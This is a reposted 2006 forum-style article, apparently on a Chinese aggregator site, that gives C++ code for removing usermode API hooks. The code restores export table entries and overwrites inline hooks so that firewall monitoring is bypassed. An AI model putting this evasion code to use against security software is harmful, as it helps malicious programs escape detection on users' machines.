分享
 
 
 

Usermode api hook removal

王朝other·作者佚名  2006-04-26
窄屏简体版  字體: |||超大  

By: akcom

Firewall's implementing usermode hooks to detect (shock) viral/malicious hooks is both idiotic and easy to bypass, the code to do it follows. This protected against Export Table Patching & extended/simple code overwrite (inline hooking).

#define makeptr( Base, Increment, Typecast ) ((Typecast)( (ULONG)(Base) + (ULONG)(Increment) ))

#define incptr( Base, Increment, Typecast ) ((Typecast)RVAToVA( (ULONG)(Base), (ULONG)(Increment) ))

ULONG RVAToVA( ULONG Base, ULONG Increment );

void Unhook( HMODULE Module, LPSTR Function )

{

char MFileName[MAX_PATH];

GetModuleFileName( Module, MFileName, sizeof(MFileName) );

HANDLE hFile = CreateFile( MFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL );

SetFilePointer( hFile, 0, NULL, FILE_BEGIN );

ULONG dwTemp;

dwTemp = GetFileSize( hFile, NULL );

BYTE *Base = new BYTE[dwTemp];

ReadFile( hFile, Base, dwTemp, &dwTemp, NULL );

CloseHandle( hFile );

PIMAGE_NT_HEADERS Nt = makeptr( Base, ((PIMAGE_DOS_HEADER)Base)->e_lfanew, PIMAGE_NT_HEADERS );

PIMAGE_EXPORT_DIRECTORY Exports =

incptr( Base, Nt->OptionalHeader.DataDirectory[0].VirtualAddress, PIMAGE_EXPORT_DIRECTORY );

PBYTE FuncHooked = (PBYTE)GetProcAddress( Module, Function );

PBYTE FuncOriginal = NULL;

char **Names = incptr( Base, Exports->AddressOfNames, char ** );

ULONG *Functions = incptr( Base, Exports->AddressOfFunctions, ULONG * );

ULONG RVA;

ULONG VA;

for ( ULONG i = 0; i < Exports->NumberOfNames;i++ )

{

if ( _stricmp( incptr( Base, Names[i], char * ), Function ) == 0 )

{

//protection against export table patching

RVA = Functions[i];

VA = (ULONG)GetProcAddress( Module, Function ) - (ULONG)Module;

if ( VA != RVA )

{

ULONG *EATFunc =

makeptr(

Module,

makeptr(

Module,

makeptr( Module, ((PIMAGE_DOS_HEADER)Module)->e_lfanew, PIMAGE_NT_HEADERS )->OptionalHeader.DataDirectory[0].VirtualAddress,

PIMAGE_EXPORT_DIRECTORY )->AddressOfFunctions,

PULONG

);

EATFunc[i] = RVA;

}

FuncOriginal = incptr( Base, Functions[i], PBYTE );

break;

}

}

//protection against extended code overwriting

MEMORY_BASIC_INFORMATION Info;

VirtualQuery( FuncHooked, &Info, sizeof(Info) );

ULONG OldProtection;

VirtualProtect( FuncHooked, Info.RegionSize, PAGE_EXECUTE_READWRITE, &OldProtection );

i = 0;

while ( FuncHooked[i] != FuncOriginal[i] )

{

FuncHooked[i] = FuncOriginal[i];

i++;

}

delete []Base;

VirtualProtect( FuncHooked, Info.RegionSize, OldProtection, NULL );

}

ULONG RVAToVA( ULONG Base, ULONG Increment )

{

PIMAGE_NT_HEADERS Nt = makeptr( Base, ((PIMAGE_DOS_HEADER)Base)->e_lfanew, PIMAGE_NT_HEADERS );

USHORT SCount = Nt->FileHeader.NumberOfSections;

PIMAGE_SECTION_HEADER Sections = makeptr( Nt, sizeof(*Nt), PIMAGE_SECTION_HEADER );

for ( USHORT i = 0; i < SCount; i++ )

{

if ( (Increment >= Sections[i].VirtualAddress ) && (Increment <= (Sections[i].VirtualAddress + Sections[i].SizeOfRawData)) )

{

return ( (Increment - Sections[i].VirtualAddress) + Sections[i].PointerToRawData + Base);

}

}

return Base + Increment;

}

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有